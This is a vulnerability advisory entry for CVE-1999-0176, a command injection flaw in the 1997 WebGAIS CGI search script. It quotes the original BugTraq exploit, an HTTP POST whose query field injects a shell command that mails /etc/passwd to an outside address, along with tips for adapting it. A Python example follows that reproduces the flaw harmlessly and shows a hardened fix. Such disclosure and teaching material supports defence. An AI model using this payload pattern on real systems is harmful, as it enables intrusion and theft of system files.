| Title | WEBgais Remote Command Execution Vulnerability |
| Published | 1997-07-10-12:00AM |
| Updated | 1999-06-01-12:00AM |
| Class | Input Validation Error |
| CVE | CVE-1999-0176 |
| Remote | Yes |
| Local | Yes |
| Credit | Posted to BugTraq on July 10, 1997 by Razvan Dragomirescu <drazvan@kappa.ro> |
| Vulnerable | WebGAIS Development Team WebGAIS 1.0 B2; WebGAIS Development Team WebGAIS 1.0 B1; WebGAIS Development Team WebGAIS 1.0 |
| Not Vulnerable | |
| Code |
Exploit details taken directly from the BugTraq post by Razvan Dragomirescu:

telnet target.host 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

[...] But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type, which are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen.
|
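The quoting failure behind the request above, as an added example (not code from the BugTraq post or from WebGAIS): it assumes, from the shape of the `query` value, that the script places that value between single quotes on a shell command line. A harmless `echo INJECTED` stands in for the posted command, and the function names and allowlist are hypothetical.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Constructed form body in the shape of the request above; a harmless
# "echo INJECTED" stands in for the command in the original post.
BODY = "query=';echo+INJECTED;echo'&output=subject&domain=paragraph"

# Assumed allowlist for search terms (not taken from WebGAIS).
SAFE_QUERY = re.compile(r"[A-Za-z0-9 ._-]{1,100}")


def form_field(body, name):
    """Decode one field of an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def search_unsafe(query):
    """Hypothetical vulnerable pattern: the value is pasted between single
    quotes in a string run by /bin/sh, so a quote in it ends the quoting."""
    cmd = "echo searching for '" + query + "'"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def search_safe(query, validate=True):
    """Hardened form: allowlist check, then the value goes to the program as
    a single argv element with no shell in between."""
    if validate and not SAFE_QUERY.fullmatch(query):
        raise ValueError("query contains characters outside the allowlist")
    done = subprocess.run(["echo", "searching for", query],
                          capture_output=True, text=True)
    return done.stdout.splitlines()


if __name__ == "__main__":
    q = form_field(BODY, "query")
    print("decoded query :", q)
    print("shell string  :", search_unsafe(q))  # the second command runs
    print("argv, no shell:", search_safe(q, validate=False))
    try:
        search_safe(q)
    except ValueError as err:
        print("validated     :", err)
```

Passing the value as an argv element is what removes the injection; the allowlist is a second layer that rejects the request before any program is started.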
Copyright 2007,
SecurityDot
Thu, 04 Dec 2008 20:41:31 +0000